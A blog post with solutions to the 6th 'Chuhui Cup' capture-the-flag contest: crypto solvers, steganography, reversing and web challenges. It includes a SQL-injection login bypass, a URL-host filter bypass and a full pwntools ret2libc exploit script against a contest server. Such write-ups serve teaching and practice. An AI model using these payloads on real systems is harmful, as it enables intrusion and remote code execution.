6th "Chuhui Cup" Official Write-up

Last updated: 1 year ago

Preface

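Because my university hosted this competition, a little backroom deal between me and the president of the Information Security Association got me the write-up for this competition. Reposting or publishing without my authorization is prohibited!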

Main text

Crypto

Easy-RSA

Just solve the equations with sympy in one go.

from sympy import Symbol, solve
from gmpy2 import *
from libnum import *

n = 27552304606229034903366058815849954030287648695063385362955432137790872571412035824128918674719247737295565001575991597519270789776408208970323808016733976338433371328100880898942106515627607388226912870981180215883273805491209461671730377099185278711453949265641966582563910708529619185885928310168288810488784242368160743359666583499117949407921812317700250240067929572558785431071173411100434109661677786734923283679392823901052633992456780285091988542875991410528415886437666510014123352497264017734716859350294159440761760921548702546470902740121962033241003215821780125194400741190925169397917247376657863011603
e = 65537
c = 8643831704675414121804983915084443744489969712473300784256427784417167322852556975560503484179280700293119974607254037642425650493676448134024809335297135239994950178868535219541095694358323044214971760829173918774094415933808417722001811285178546917655837402000771685507972240389565704149610032767242977174132826100177368764169367458684152505611469248099487912367364804360878611296860803835816266114046682291529593099394952245852157119233687981777202751472502060481232341206366584532964027749320641690448228420342308891797513656897566100268729012788419021059054907653832828437666012596894150751431936476816983845357
s = 3216514606297172806828066063738105740383963382396892688569683235383985567043193404185955880509592930874764682428425994713750665248099953457550673860782324431970917492727256948066013701406000049963109681898567026552657377599263519201715733179565306750754520746601394738797021362510415215113118083969304423858
# p = Symbol('p')
# q = Symbol('q')
# p, q = solve([p*q-n, p-q-s], [p,q])
# print(p,q)
p = 167604917202624171205562332547086795459018271995531662202392816766661852499967774267554085060619750182533064588995245441659492248123164548905239665224600839192261379211031757557080502863539123811164713057605073461933854926502162793803096063035806777877263036653498763650955936640215477205393488552237210705691
q = 164388402596326998398734266483348689718634308613134769513823133531277866932924580863368129180110157251658299906566819446945741582875064595447688991363818514760290461718304500609014489162133123761201603375706506435381197548902899274601380329856241471126508515906897368912158915277705061990280370468267906281833
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c,d,n))))
# b'flag{9c0532a253809f180747b6da334b438f}'

EasyRandom

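First use MT19937 pseudorandom number prediction to recover the two values used in the XORs. Because tmp is urandom(3) and its sha256 digest is also given, tmp can be recovered by brute force. After the XOR we get the value (n1<<64)+(n2<<40)+n3, and the bit lengths show that the three parts do not overlap. Take the low 40 bits of the binary as n3 and brute-force the affine cipher to get the last ten hex digits of the flag. Take the middle segment as n2 and XOR it with tmp to get the middle 6 hex digits of the flag. Take the leading segment and XOR it to get the first 32 hex digits of the flag. Concatenate the three parts and apply n2s to get the final flag.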

randist=[3693014292, 1999090277, 2812362804, 2118249952, 885988212, 1131999143, 3327925205, 731275596, 1818780432, 644434032, 3301077903, 1004325730, 113617890, 262927352, 1449581419, 1596910105, 3680959953, 4039323321, 2422810127, 946521915, 4049336142, 1299247828, 3361233447, 1319347681, 2858084207, 2493466845, 522894151, 3272590535, 2518746559, 113976089, 1912521614, 1971657011, 4052443472, 1928327357, 1481517158, 1707968618, 3946904293, 3941277234, 1740669853, 177473759, 2855945159, 3217808064, 568887441, 2243547768, 533475147, 4005163087, 1991762580, 1175403787, 1819485104, 4162426193, 2480060730, 1889558541, 1659122908, 2343813603, 1792751594, 3287109162, 4119020356, 2086904766, 4227102603, 4251617926, 386544361, 2024596798, 3275172220, 1652143183, 4279693598, 1741714555, 3920640884, 837190820, 4242688797, 3406136725, 272163458, 1933729342, 3348914742, 3483202044, 313505665, 3180958891, 276638359, 2247257889, 1283002827, 253470155, 2172073971, 3333335918, 321125332, 3478202657, 1298557332, 1255183068, 2347216752, 1823003608, 1873938039, 4172493668, 1252876713, 2877329304, 2733470437, 743814046, 1482554102, 3967801003, 4135521914, 1601509876, 1370623470, 564556001, 3369378190, 1930652933, 2684027015, 730072119, 3133537560, 554522157, 4200260396, 66286223, 2856462351, 3409097597, 1123352314, 3112249875, 660537433, 1027164908, 2875953843, 3419766147, 64818752, 1572659846, 176068922, 2155262681, 3154282688, 3215591301, 923444143, 54743986, 3011602372, 1936525684, 2636863705, 3228231549, 3660514246, 2503374986, 1180875896, 941948277, 1922552596, 740696852, 2337729160, 1636823570, 1788245610, 2970204367, 1597424641, 3940594526, 846332502, 3177694219, 1253960959, 1980517147, 2066843131, 3452017677, 743662084, 3332614739, 1230416894, 1790783329, 3339256849, 1223003548, 3155010716, 211801309, 3302823875, 2203405123, 4027118331, 3928670766, 1551556760, 2018355543, 2473765725, 2451139992, 3923372144, 2197282188, 2056399604, 1294675076, 1121984516, 113881691, 1646921221, 
3151728031, 695534775, 3870352246, 1614457851, 1764207471, 3516853329, 3276173646, 3559299512, 1239291648, 2417317314, 908861203, 3945977517, 1789725976, 1094256533, 1194981603, 3817224425, 4294621339, 3041360046, 1319794040, 1881403289, 151945988, 3036988698, 2214811128, 240957157, 509921068, 1538884056, 119208760, 1425862614, 2923918837, 845827337, 507023267, 2955299274, 1247972138, 766611587, 2012831811, 3441161631, 2645633381, 2328705244, 512481283, 461960350, 1704754200, 1327914555, 147555684, 3349647800, 3062151439, 3090502250, 937966533, 82567652, 725403325, 4001427888, 524069543, 2291211027, 2084465414, 1292961088, 4278389999, 1309916992, 3249380344, 3493113838, 83526738, 4193860366, 2438456426, 3510215857, 175761668, 2820499306, 1792194251, 1225332544, 3896268058, 2752286952, 3182785082, 956435024, 3996152048, 2924148655, 2895936126, 1856977607, 1289267397, 690722358, 1937429718, 1531967867, 2098208046, 1815108525, 1567735201, 146084074, 2093897143, 2793246617, 1146380003, 2523936201, 2301399576, 2052473947, 3470101770, 3722302451, 3345343326, 2271545308, 2657475692, 2211989611, 2428885922, 2097052181, 3554955904, 1704837589, 1494941216, 3403108634, 911409695, 3550042769, 379101531, 406655201, 1317011271, 2336674904, 3930303124, 3038552846, 3207659329, 2785076651, 1203119790, 1146774748, 2218279443, 494710315, 3507507044, 922439915, 35699688, 2690622469, 1458912003, 3911367650, 983115567, 2813252332, 839947939, 514499603, 3894529528, 326817358, 1479783722, 4242051909, 3492972915, 3473946915, 3348053727, 3681386488, 584266203, 3531080708, 3262223061, 2904040234, 3897643811, 2706405422, 914107260, 3011659451, 308811435, 4103121550, 4023430755, 2975129044, 4139500620, 1763891748, 57665971, 3149249501, 870034516, 4142837134, 3130156432, 1708266697, 1242161643, 1163332264, 108174709, 1633896347, 2820171620, 1708875131, 724124719, 3562786877, 518616285, 3643662732, 3375737681, 2550728441, 1823319080, 1775922455, 3838709569, 177763087, 946611206, 4054832304, 
1473954380, 3475817789, 2590152780, 3587873907, 3437231816, 2708036272, 3883447173, 655291275, 707049339, 1352718730, 3543000675, 962283943, 4170075509, 1897499376, 643615933, 856277089, 3299581344, 4093601146, 2638625975, 1563647962, 890552183, 3138216177, 222946344, 4219020514, 3218803481, 3093722090, 1210144957, 3499543439, 4239553976, 3582176749, 654186756, 3005601303, 1252241368, 2459425960, 3587113096, 3506651695, 3673557784, 4157576483, 733173716, 1505997631, 394626148, 1322270695, 84604461, 891267254, 518241635, 1068682198, 3696554893, 3111393676, 1398539042, 901276151, 483471144, 1952219546, 2884270239, 2215979688, 4138748504, 1623101775, 3102260771, 4276348310, 1228132323, 2250922664, 833982365, 3402246096, 2085678412, 2707953187, 590837194, 3421635592, 3488064851, 3655525766, 1029679348, 2448841196, 89284911, 3970560858, 334986490, 3063032848, 3172506167, 2391313449, 3589023591, 4269870234, 3275101066, 1716650872, 483502324, 2116979028, 815078501, 3475316209, 1003463022, 2418993968, 4251101825, 346290993, 3286645593, 2654742976, 99974317, 4124695845, 3732280507, 1536249568, 1440486445, 1605422491, 393607563, 1141210694, 43848150, 1656624711, 2170355702, 327988021, 974870171, 2169013815, 3689546490, 3576028106, 4258679518, 14944446, 1786133397, 264814384, 1969519378, 1769400868, 3098042628, 22547518, 3195136230, 42683806, 1288550835, 59638233, 3534385409, 2517101496, 3632913591, 3894777481, 2912655780, 1614602217, 3498478791, 1309795895, 3961554801, 3625321205, 308138165, 2885107341, 1003378866, 3462951062, 1914176024, 3130918711, 3919345882, 3556964414, 2382442356, 3968605965, 2388890395, 1955471760, 2358533573, 2323037969, 4273118548, 3577096972, 4251790958, 2321545863, 2057106840, 4000766037, 1551111470, 368761666, 951769999, 778229999, 4235748487, 2020142699, 3577752281, 1269488993, 1350156870, 529843408, 669182431, 3871401874, 2180265713, 3850183472, 46915226, 3150800412, 1139932212, 2523557119, 1462042012, 301258444, 165757583, 530704729, 
1848179734, 1792342751, 2597916820, 4041946457, 1127104524, 3768573884, 2614008065, 741308521, 477746986, 507411825, 4235293189, 2251811519, 811234592, 1985999307, 844715613, 1640781314, 3538036580, 2764130557, 2863454433, 1831736583, 3857379783, 658928449, 1149649578, 103125751, 2968446555, 885660863, 707321834, 1728646363, 2706995220, 3062604255, 4177710084, 3076079677, 879366858, 3936728615, 8828906, 1656874220, 2904085639, 397694272, 1604508691, 2083663236, 2138468690, 1365350684, 2870684769, 384435793, 1063724290, 1142482048, 809857977, 4192515435, 267878653, 206018017, 3441769173, 925696591, 2250932557, 1973183700, 577661907, 2551314381, 1350352597, 4151551172, 774849773, 2391866106, 3444137245, 403261487, 2724363448, 3572536490, 1077243504, 302416473, 3457548858, 564604707, 1238169871, 2356838464, 3083335214, 3844937218, 1272458074, 1782962159, 1543604321, 3212537899, 426074894, 3053843067, 2436223151, 94019340, 4147659323, 2893920832, 626619793, 3976626567, 1884877146, 2696384440, 1177352315, 1082374195, 3289271804, 1485815836, 120127000, 3349349501, 164243314, 1703351326, 1017276501, 413737931, 408060344, 472141408, 172738862, 4001606849, 1888805432, 2927218529, 1293362241, 1941759619, 1760659398, 274865852, 978985751, 3867215904, 177291528, 1083045308, 3888975618, 979933689, 2211634008, 3899294132, 1174569575]
Hash='b0cfb7293d6842e3279f4ef0fc88284174349e111e5b9beb28263df72c9db0bf'
res=1045726758250168034320246515934682860724576730763168865120


from mt19937predictor import MT19937Predictor
from libnum import *
predictor = MT19937Predictor()
for i in randist:
    predictor.setrandbits(i, 32)
x = predictor.getrandbits(128)

from os import urandom
from hashlib import *
from tqdm import tqdm


# for i in tqdm(range(256)):
#     for j in range(256):
#         for k in range(256):
#             if sha256(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big')).hexdigest() == Hash:
#                 print(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big'))
#                 exit()

tmp = b'\xfeV\xe8'
# y = predictor.getrandbits(192)
# print(res ^ y)
# print(bin(3096872116674666632134706098360014813425478687167245803096)[2:])

res = '11111100100110011011010100000010100111101010001110010110101000111010000101111001111100001100100001111110000100000010001010110111001001000101111101101110101101110110111010111010101111001011000'
n3 = res[151:]
n3 = int(n3, 2)
n3 = hex(n3)[2:]

def affine(s):
    return hex((int(s,16)*13+7)%16)[2]

from string import *

# Invert the affine map digit by digit: try all 16 hex digits for each output digit
flag3 = ''
for i in str(n3):
    for j in digits + 'abcdef':
        if hex((int(j, 16)*13+7)%16)[2] == i:
            flag3 += j
# print(flag3)
# 64406e6365

tmp = int(tmp.hex(), 16)
n2 = int(res[127:151], 2)
print(hex(n2 ^ tmp)[2:])
# 6c795f
# for i in range(10, 135):
#     n1 = int(res[:i], 2)
#     if len(hex(n1 ^ x)[2:]) == 32:
#         print(i)
#         print(hex(n1 ^ x)[2:])


# flag = 0x16ef9b7e65eaccdac7f2a82242f97461fe795f64406e6365
# print(n2s(flag))
# flag = 0x365ac09e91965ba65b83ea0952bf789afe795f64406e6365
# print(n2s(flag))
flag = 0x7730775f796f755f63616e5f7233616c6c795f64406e6365
print(n2s(flag))
# flag = 0xf5e518dca89d28ad12a466f3332b5280fe795f64406e6365
# print(n2s(flag))

# flag{w0w_you_can_r3ally_d@nce}

Puzzle

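First apply the c3pto function repeatedly to obtain the key. Because the iv is prepended to the plaintext, the first round of CBC encryption is equivalent to encrypting 0. So encrypting 16 zeros in ECB mode gives the value of the iv. After decrypting, strip the first 16 bytes (the iv) and apply b2l to get n. Since n is p to the k-th power, where k is a random number from 3 to 10, p and k can be found by brute force with iroot. Then phi is p^4-p^3, and ordinary RSA decryption finishes it.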

from Crypto.Util.number import *

# ans = 38003142990385686484863558905791098358375993231657244276476071305023256088640
# for i in range(3000):
#     ans = c3pto(ans)
#     if len(long_to_bytes(ans)) == 16:
#         print(long_to_bytes(ans))
#         print(i)
#         break
key = b'\xe3+\x91\t\x98\xf3\x1e\xc1:GdW\xa7\x9c\xed\xc8'

cipher = b'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'
from base64 import *
# print(b64decode(cipher))
from Crypto.Cipher import AES
aes = AES.new(key, AES.MODE_ECB)
iv = aes.encrypt(b'0'*16)
# iv = b'<\xf1t)J\xb94\x94\x96k\xb3\xa6\xd0l\x1f\x18'
# print(len(iv))
aes = AES.new(key, AES.MODE_CBC, iv)
# print(bytes_to_long(aes.decrypt(b64decode(cipher))[16:]))
n = 1920996599715856445859942653561518934623770349604567944119888918652929850438550031530085825233427804287948103028196002575052115431818579071064151162356783271098909921048633702881792225177576702177783394293902383558020910817690003482407131040012274651950092905033478096946480957376032885892865874889512491228086685657180813752415901449931616515829876132124869394914811513314610626994601896632310860864383681883278519011366621783621875829468795129412110195542393565122376090837147976779206479563025260355409760966253950455760746188829132713361361971369834556263031779301594614869471449001606096892554595117248843798583182697278557608427540966922986276244349169217145887847468511930831624120645515569454042068543037557717607529597806902336605960746206162919208286537365840210950059241416518910364155450866687125242036214224348553323506344344102556858999785756537071140602028749645893331276336495819156594873943920547669249384735859086272564256778984096700038355778772306959532307797726242570189524997353178221196850996697501101899293398154896045920117057475225094430995308712273591001121684741882135997425395587135085253772016751944856423432708834384869065305715283590249792604221063352475125970061268836350903407534750806898385734177411016970056675098041174770787143432248377669711752885542283641753128030604059522342772896533538210491676802893224243707301163314858069924423307522627546571702093017968265209035169392705414846309180519984311047465670680503038372665118575936644576752038746223774266569511346973216686624647684611251194917570740023582776304387799818313947884639527387873811763505321348251126789940907331932263617775375322695159224859379763496659913997723887213979604683923511556644813537306388318369949499830373503843827533273057294039414936863418922517532788113723389666518288449110343528868091900608839950568474565559503156113269875452766295294350688131581706908239020547873625720887383358917733439136322588748324389983343329132618107600870477585527545665753085366753972519870934871
64542963055804002441751864022715424662848335470359948420027756835213050500577294799638589135949755879898985814242501638839907383377834819866500082619067419468232672548637154121177897443704368253245514204975147693342503301921844252239673318375741456151277008424086433210309669337358030499431697081307189511178107489812792122478536534259554160073644974772253911579253927334216606449192146737795612311912838169178570116934403812068138348378295739329366212651044519758844001
e = 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
c = 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


from gmpy2 import *
from libnum import *
# for k in range(3, 10):
#     if iroot(n, k)[1]:
#         print(iroot(n, k)[0])
#         print(k)
k = 4
p = 20935418603755826153357961486749000137883878122092541278485245382546346099923598569473814209357669395236788185259189925906627960621490996925200115559569329810746744675867738485473466021581185385430988547168263735484625716958718825113577345085361945421237478366338611831738408648424304228723729310335432168121087334054958276987167490905779911687736536416815227240962562460212183301435420718431023950641725670461044591993133883921646824589614644103106984493917214402278641218422432546374433956301830629567708335305598359150744372547912472684947785245810663217040977994966632748245272393755319650187559761562868158211001
print(isPrime(p))
phi = p ** 4 - p ** 3
d = invert(e, phi)
print(n2s(int(pow(c, d, n)))[64:])
# b'flag{6354ce3ac23cdfeccf16eb1a53df4423}'
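
Why a prime-power modulus gives no protection, as an added example (not code from the original write-up): factoring reduces to an exact integer root, and phi(p^k) = p^k - p^(k-1). It uses pure-Python bisection instead of gmpy2, and the prime, exponent and message are constructed toy values.

```python
def iroot(n, k):
    """Return (r, exact) with r = floor(n ** (1/k)), using integer bisection."""
    lo, hi = 0, 1 << (n.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == n

def split_prime_power(n, k_max=10, k_min=3):
    """Find (p, k) with p ** k == n.

    Exponents are tried from largest to smallest so that p ** 8 is reported
    as (p, 8) rather than (p ** 2, 4).
    """
    for k in range(k_max, k_min - 1, -1):
        root, exact = iroot(n, k)
        if exact:
            return root, k
    raise ValueError("n is not a perfect k-th power in the tested range")

def prime_power_phi(p, k):
    # phi(p**k) = p**k - p**(k-1); for k = 4 this is the page's p**4 - p**3.
    return p ** k - p ** (k - 1)

def decrypt(c, e, n):
    """Textbook RSA decryption for a modulus that is a prime power."""
    p, k = split_prime_power(n)
    d = pow(e, -1, prime_power_phi(p, k))  # modular inverse, Python 3.8+
    return pow(c, d, n)

def demo():
    # Constructed toy parameters: a 61-bit Mersenne prime raised to the 4th power.
    p, k, e = 2 ** 61 - 1, 4, 65537
    n = p ** k
    m = int.from_bytes(b"constructed msg", "big")
    c = pow(m, e, n)
    return split_prime_power(n), decrypt(c, e, n) == m

if __name__ == "__main__":
    print(demo())
```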

Misc

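A Bag of Rice (一袋米)

Found the original challenge by searching:

https://blog.csdn.net/weixin_46079186/article/details/120941245

Compress Yahiko.png into a zip with WinRAR and run a known-plaintext attack with the ARCHPR tool. After extracting, open the docx, select all, and change the text color to red to reveal the flag.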

flag{c05909321b5e318bf6b0e41586f31882}

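The Internationale (国际歌)

Use foremost to extract a bmp image and open it in stegsolve. Under Analyse choose Data Extract, tick bit plane 0 of each of the r, g and b channels, and Save Bin to get the image containing the flag.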


Host_log

Found the original challenge by searching:

https://blog.csdn.net/weixin_46079186/article/details/120941245

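Write a script: first combine the 4 files and collect all the IPs, then filter IP by IP, dropping every IP that appears more than once. In the end 8.8.4.4 turns out to appear only once. Looking it up gives IP: 192.168.100.115, account name: lucy.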

flag{192.168.100.115-lucy}

Web

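Both web challenges were freebies..

baby_sql

Entering admin / 123 shows: you are not admin

Then I tried a universal password and got "Hack detected"; fuzzing showed that a lot of inputs are banned.

I had previously run into a BUUCTF challenge that used \ to escape the quote and achieve injection that way.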

payload

username=admin&password=||1=1# 

I thought it might be testing blind injection, but the flag was right there after logging in...


Easy-WEB

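It opens to a login form; I casually tried injection with no luck. A dirsearch scan found /.DS_Store

Its contents reveal several php files. I first visited yzmcode.php and got no ideas, then visited yfhgyrt.php and got the source: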

<?php
header("content-type:text/html;charset=utf-8");
include("./flag.php");
show_source(__FILE__);

if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    if(!$url){
        die('Can not parse url: '.$_GET['url']);
    }
    if(substr($_GET['url'], strlen('http://'), strlen('google.cn')) === 'google.cn'){
        die('Hey, 老哥, 你会绕过吗!');
    }
    if(
        $url['host'] === 'google.cn'
    ){
        echo "flag{".$flag."}";
    }else{
        die('老哥!!!');
    }
}
?>

Not hard: just bypass it with the @ form.

payload

http://47.101.38.214:50002/yfhgyrt.php?url=http://My0n9s@google.cn/
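
Why the fixed-offset string test and the parsed host disagree, as an added example (not code from the challenge or the original write-up). It ports the `substr()` test to Python and uses `urllib.parse` as a stand-in for PHP's `parse_url`; the sample URLs are constructed.

```python
from urllib.parse import urlsplit

DENIED_HOST = "google.cn"  # the host named in the challenge source

def blocked_by_prefix(url):
    """Python port of the page's substr() test at a fixed offset after 'http://'."""
    start = len("http://")
    return url[start:start + len(DENIED_HOST)] == DENIED_HOST

def normalized_host(url):
    """Host as a parser sees it: userinfo dropped, lower-cased, trailing dot removed."""
    try:
        host = urlsplit(url).hostname
    except ValueError:  # malformed authority, e.g. an unterminated IPv6 literal
        return None
    return host.rstrip(".") if host else None

def blocked_by_host(url):
    """Decide on the parsed host, and fail closed when it cannot be determined."""
    host = normalized_host(url)
    return host is None or host == DENIED_HOST

def compare(urls):
    """Return (url, prefix_verdict, host_verdict) for each sample."""
    return [(u, blocked_by_prefix(u), blocked_by_host(u)) for u in urls]

# Constructed sample inputs (not taken from the challenge server).
SAMPLES = [
    "http://google.cn/",
    "http://user@google.cn/",     # userinfo shifts the host past the fixed offset
    "http://GOOGLE.cn/",          # parsers lower-case the host, the string test does not
    "http://google.cn.example/",  # a different host that merely starts with the string
]

if __name__ == "__main__":
    for row in compare(SAMPLES):
        print(row)
```

The string test misses the second and third samples and wrongly flags the fourth, so any filter should be applied to the same parsed host that the later code acts on.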


Reverse

s.apk

An APK challenge. Drop it into jeb for static analysis first; the main logic is in MainActivity, so decompile it and take a look.


There is just a checkSN function: the first argument is "Tenshine" and the second is the user input.

Now look at the body of this function.


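The logic is also simple: concatenate the characters at even positions of MD5(argument 1), wrap the result in flag{}, and compare it with argument 2; if they are equal, the input is correct.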

exp

tmp2 = 'b9c77224ff234f27ac6badf83b855c76'         # md5("Tenshine")

for i in range(len(tmp2)):
    if i % 2 == 0:
        print(tmp2[i], end='')
# flag{bc72f242a6af3857}

爱生活dota (Love Life, Dota)

32-bit, not packed; open it in IDA.

The logic is all in the main function and is simple; here is a brief analysis.


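It is just a username and a password. The username is given directly as StarsWarss; the password goes through a simple XOR, which can simply be reversed.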

exp

text = [0x76, 0x2A, 0x1F, 0x58, 0x33, 0x2B, 0x38, 0x76, 0x5F, 0x44,
0x79]

tmp = 'WuSheng2009'

for i in range(len(text)):
    print(chr(text[i] ^ ord(tmp[i])), end='')
# Concatenate the pieces
# KEY{StarsWarss!_L0VE_Dot@}

Pwn

math

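It is just a stack overflow, but the size input goes through abs32 (absolute value) followed by a modulo. For signed numbers, the range of two's complement means that the absolute value of the most negative number (-0x80000000) cannot be represented, so the result of taking the absolute value is still -0x80000000. That allows 0xe0 bytes to be read in. After that, leak libc with puts and jump to a one_gadget.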

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

p = remote("47.100.117.2",10005)
#p = process("./math")
elf = ELF("./math")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi = 0x400813 #pop rdi;ret
main = 0x40075b
ret = 0x400566


# Stage 1: pass the size check, then leak the address of puts
p.sendlineafter(b"size\n", str(int(-0x80000000)).encode())
#gdb.attach(p)
payload = b'a'*(0x40) + b'b'*0x8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.send(payload)
p.recvuntil(b'\n')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
log.info("puts_addr="+hex(puts_addr))

libc_base = puts_addr-libc.sym["puts"]
log.info("libc_base="+hex(libc_base))
ogg = libc_base+0x4f432

# Stage 2: back in main, same size trick, return into the one_gadget
p.sendlineafter(b"size\n", str(int(-0x80000000)).encode())

payload1 = b'a'*(0x40) + b'b'*0x8 + p64(ret) + p64(ogg)
p.send(payload1)
p.interactive()
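
The abs() behaviour described above, emulated in Python as an added example (not code from the challenge binary or the original write-up), next to a range check that does not rely on abs(). The modulus 48 and the truncation to one byte are assumptions, chosen so that the constructed case yields the 0xe0 length the write-up mentions; the binary's actual constants are not shown on the page.

```python
INT_MIN, INT_MAX = -0x80000000, 0x7FFFFFFF

def to_int32(x):
    """Wrap a Python int to a signed 32-bit two's-complement value."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x

def abs32(x):
    """abs() as a 32-bit machine computes it: negate, then wrap."""
    x = to_int32(x)
    return to_int32(-x) if x < 0 else x

def c_rem(a, b):
    """C's % truncates toward zero, so the result takes the sign of a."""
    q = abs(a) // abs(b)
    if (a < 0) != (b < 0):
        q = -q
    return a - b * q

def unchecked_len(size, modulus=48):
    """Pattern from the text: abs, then modulo, then use as an unsigned count.

    modulus=48 and the one-byte truncation are assumed values (see lead-in).
    """
    return c_rem(abs32(size), modulus) & 0xFF

def checked_len(size, limit):
    """Hardened form: reject out-of-range input instead of folding it into range."""
    if not (0 <= size <= limit):  # excludes INT_MIN too, with no abs() involved
        raise ValueError("size out of range")
    return size

def demo():
    """Lengths the unchecked pattern produces for ordinary and extreme inputs."""
    return [unchecked_len(s) for s in (10, -10, 100, INT_MIN)]

if __name__ == "__main__":
    print([hex(v) for v in demo()])
```

Every input except INT_MIN stays below the assumed modulus; INT_MIN alone survives abs() as a negative number and comes out far larger than the 0x40-byte padding the exploit script uses.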

https://rookieterry.github.io/2021/12/07/第六届“楚慧杯”官方Write-up/
Author: HackerTerry
Published: Tuesday, December 7, 2021, 5:14 PM